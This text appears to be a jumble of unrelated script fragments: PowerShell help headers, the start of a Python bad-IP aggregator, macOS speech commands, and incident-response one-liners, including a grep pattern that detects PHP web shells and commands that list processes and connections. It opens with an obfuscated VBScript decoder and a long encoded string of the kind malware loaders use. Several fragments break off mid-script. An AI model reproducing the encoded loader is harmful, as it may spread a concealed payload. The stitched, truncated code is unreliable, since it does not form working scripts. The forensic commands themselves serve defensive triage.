Private Function BysqAEwmfD(zEx) : If Len(zEx) < 5 Then : a = "" : Exit Function : End If : Dim p : zEx = Mid(zEx,3,Len(zEx)-4) : For i=2 To Len(zEx) Step 2 : xehFDCC = Asc(Mid(zEx,i,1)) + 10 : If xehFDCC > 126 Then : xehFDCC = xehFDCC - 126 + 33 - 1 : End If : j=Chr(xehFDCC) : If j = "~" Then : j=" " : End If : p = p & j : Next : BysqAEwmfD = p : End Function : BnjBhzaGjEs = BysqAEwmfD("}H6Iv[7j~tci.[phYlt_nY9[/t*3rtH91hl[]W^j|[3EDXw`{[&YWj:|CvjInYN^([hZkk,bm[w$QI\[NhTlv_rYr[HvO}gtL0&tNY:W`bDb~t]i.[KhUlj_JY^[y$!9yevd*d|[{YBjN|u}/t+0Tt#:,_DcMt=jBWhi:a?:B[q\z_Vd~_(j+_oe3det_0ytmI>[rjatgj0WVi'aE:5[i\`_3d+_@jM_]eTd#tb3=tkik[(h=lX_:Y=[v$1DS[bmKJ]W,i3aJ|Q&>}Rt|tS0[tcjDWliXa_:)[(\j_=dl_Aj&_Yeqd\$'H+[r]/_(iaj^hUWujE_>eTd6?cd`\de,$"":x[YikY=hN_#fWj%_,e^d9tR3HtrvSj0WAilan:>[2ibY6v0t^0Itqj~W=iHa>:S[/\^_Ldi_Zj#_KepdU$uIz[:jkj{_cdC]\i=$=;}dpWdX-bK[fZ>te3ktZJ>h5k.[?t-0.tOj8WfiGaY:D[5\]_7df_UjZ_[e!dk$%I*[Gj<j__.dr]BiD$RIEj#WshijdM1^A[rd17olPW4_rbiW
<#
.SYNOPSIS
sqlite.ps1 - Install, run, and uninstall sqlite for all your hacky needs.
.OUTPUTS
Should be no outputs other than what is generated in the sqlite session.
.EXAMPLE
.\sqlite.ps1 - _Runs the script_
.NOTES
Underscores denote sarcasm
#>
<#
.SYNOPSIS
Pull the following from the DC:
# Local Time
# Desktop settings
# BIOS info
# Installed hotfixes
# Operating System Version Information
# Local Users and owner
# All services on local machine
#!/usr/bin/python
# Let's get those evil IPs!
# If you’re using Linux or BSD systems, check your favourite package repository for python-celementtree or py-celementtree packages
#
# Aggregation of bad IPs is what this is after, and that's what I'll make it do
#
import xml.etree.cElementTree as ET
import numpy as np
import sys
<#
.SYNOPSIS
Uninstall HP Data Protector if it exists
.INPUTS
Path for:
# HP Data Protector
.OUTPUTS
Console output - Currently
.NOTES
Version: 1.0
#!/bin/sh
say -v Karen "theee"
say -v Daniel "eeeeee"
say -v Alex "eeeeee"
say -v Tessa "eeeeee"
## Using Test-Connection, test connectivity to the internet using the following as subjects: ##
## 8.8.8.8
## http://google.com
## https://google.com
## Find and replace XXXX with your choice of internal DNS name :)
##
function UX-Pause {
    Write-Progress -Activity "Testing Connection" -SecondsRemaining 3
    Start-Sleep 1
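# Print the file capabilities of every entry in the current directory (glob instead of parsing ls output, so names with spaces work)
for filename in ./*; do getcap "$filename"; done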
# Look for potentially bad stuff that's compressed to hide mysterious things - run this within the document roots of web servers to find potential PHP shells (source: https://djlab.com/2010/09/finding-php-shell-scripts-and-php-exploits/)
grep '((eval.*(base64_decode|gzinflate|\$_))|\$[0O]{4,}|FilesMan|JGF1dGhfc|IIIl|die\(PHP_OS|posix_getpwuid|Array\(base64_decode|document\.write\("\\u00|sh(3(ll|11)))' . -lroE --include='*.php*'
# Print out processes in a nicer format to compare its shown source to actual source
ps -Ao pid,comm,cmd,lstart
# Deny those damn pesky processes their CPU time - this is based on all the bad processes being under a single user. Don't run this unless you're sure that
pkill -U <user> -STOP || pkill -STOP -U <user> # Depending on OS
# Deny processes CPU time - this is based on a process by process working order
## Sources:
# https://www.dionach.com/blog/powershell-in-forensic-investigations
# https://www.sans.org/reading-room/whitepapers/critical/uncovering-indicators-compromise-ioc-powershell-event-logs-traditional-monitoring-tool-36352
# https://blogs.technet.microsoft.com/heyscriptingguy/2012/05/28/use-powershell-to-aid-in-security-forensics/
# Lists all established TCP connections; you can also use netstat to list all connections regardless of status. Decide whether you want to see TCP or UDP and remove the parentheses
Get-NetTCPConnection -State Established
netstat -ano -p (TCP/UDP)
# List out all processes running on the server